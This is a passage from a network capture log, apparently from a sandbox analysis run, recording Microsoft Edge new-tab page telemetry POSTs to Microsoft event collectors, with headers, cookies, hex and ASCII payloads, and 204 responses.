                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: D2B19491A6C540CBB5B1B39C5A491069 Ref B: CHI30EDGE0410 Ref C: 2025-01-11T06:54:40Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:40 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  62192.168.11.205679813.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:43 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578482833&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 21272
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:43 UTC16384OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 34 32 2e 38 33 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 37 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:54:42.832Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":7,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loca
                                                                                                                                                                  2025-01-11 06:54:43 UTC4888OUTData Raw: 22 3a 22 6e 65 78 74 53 6c 69 64 65 41 72 72 6f 77 22 2c 22 79 22 3a 31 31 2c 22 69 22 3a 36 39 2c 22 70 22 3a 36 37 2c 22 6f 22 3a 31 39 2c 22 65 78 74 22 3a 7b 22 72 6f 77 22 3a 31 2c 22 63 6f 6c 22 3a 31 2c 22 77 69 64 74 68 22 3a 36 31 32 2c 22 68 65 69 67 68 74 22 3a 33 30 34 2c 22 73 6c 6f 74 22 3a 30 2c 22 74 72 61 63 65 49 64 49 6e 64 65 78 22 3a 30 2c 22 63 6f 22 3a 31 7d 7d 2c 7b 22 6e 22 3a 22 69 6e 66 6f 70 61 6e 65 74 61 62 22 2c 22 79 22 3a 31 31 2c 22 69 22 3a 31 34 35 2c 22 70 22 3a 36 37 2c 22 6f 22 3a 31 2c 22 65 78 74 22 3a 7b 22 72 6f 77 22 3a 31 2c 22 63 6f 6c 22 3a 31 2c 22 77 69 64 74 68 22 3a 36 31 32 2c 22 68 65 69 67 68 74 22 3a 33 30 34 2c 22 73 6c 6f 74 22 3a 30 2c 22 74 72 61 63 65 49 64 49 6e 64 65 78 22 3a 30 2c 22 63 6f 22
                                                                                                                                                                  Data Ascii: ":"nextSlideArrow","y":11,"i":69,"p":67,"o":19,"ext":{"row":1,"col":1,"width":612,"height":304,"slot":0,"traceIdIndex":0,"co":1}},{"n":"infopanetab","y":11,"i":145,"p":67,"o":1,"ext":{"row":1,"col":1,"width":612,"height":304,"slot":0,"traceIdIndex":0,"co"
                                                                                                                                                                  2025-01-11 06:54:44 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=36846c30f1714fb283bfb14ab5aeeaad&HASH=3684&LV=202501&V=4&LU=1736578483841; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=5dc5be9766634cc4b9e6ed294a4e0f8f; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1008
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:43 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  63192.168.11.205822713.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:46 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578485347&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10380
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:46 UTC10380OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 34 35 2e 33 34 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 38 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:54:45.346Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":8,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loca
                                                                                                                                                                  2025-01-11 06:54:46 UTC889INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=3ffe8e8bc1f0475b83f5cbab7ebb8d17&HASH=3ffe&LV=202501&V=4&LU=1736578486316; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=8882ad015e404da7b7ea8250717e67bd; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 969
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:46 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  64192.168.11.205059013.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:49 UTC1049OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578488354&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 9386
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:49 UTC9386OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 34 38 2e 33 35 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 39 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:54:48.353Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":9,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loca
                                                                                                                                                                  2025-01-11 06:54:49 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=95ec412589514a4db51e8afe94232cde&HASH=95ec&LV=202501&V=4&LU=1736578489550; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=b6ad3ecd294f4fb1b6d2133affbfacb4; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1196
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:49 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  65192.168.11.2060513204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:49 UTC1029OUTGET /notify/viewed?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=087acc36-08c1-4daa-8dbd-3c1c710f7f4a&ii=1&c=15351574985914386683&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1
                                                                                                                                                                  Host: srtb.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:50 UTC581INHTTP/1.1 204 No Content
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 24B19E45AACE4E09ABF97EACE94200FB Ref B: CHI30EDGE0421 Ref C: 2025-01-11T06:54:49Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:49 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  66192.168.11.206367413.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:52 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578491392&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10113
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:52 UTC10113OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 35 31 2e 33 39 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 30 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:54:51.391Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":10,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:54:52 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=14b506eca1be4f9b96759c40bae3f9d1&HASH=14b5&LV=202501&V=4&LU=1736578492421; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:52 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=d62cdeb50cb44aea9592c12e6969f3c8; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:52 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1029
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:51 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  67192.168.11.205708513.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:52 UTC1049OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578491913&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 8657
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:52 UTC8657OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 35 31 2e 39 31 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:54:51.913Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":11,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:54:53 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=2017f3102b8b4a5f8ded695eb9e44497&HASH=2017&LV=202501&V=4&LU=1736578492921; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:52 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=8310183d61c1428a95482efa58cb1f19; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:52 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1008
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:52 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  68192.168.11.206086613.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:55 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578494345&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
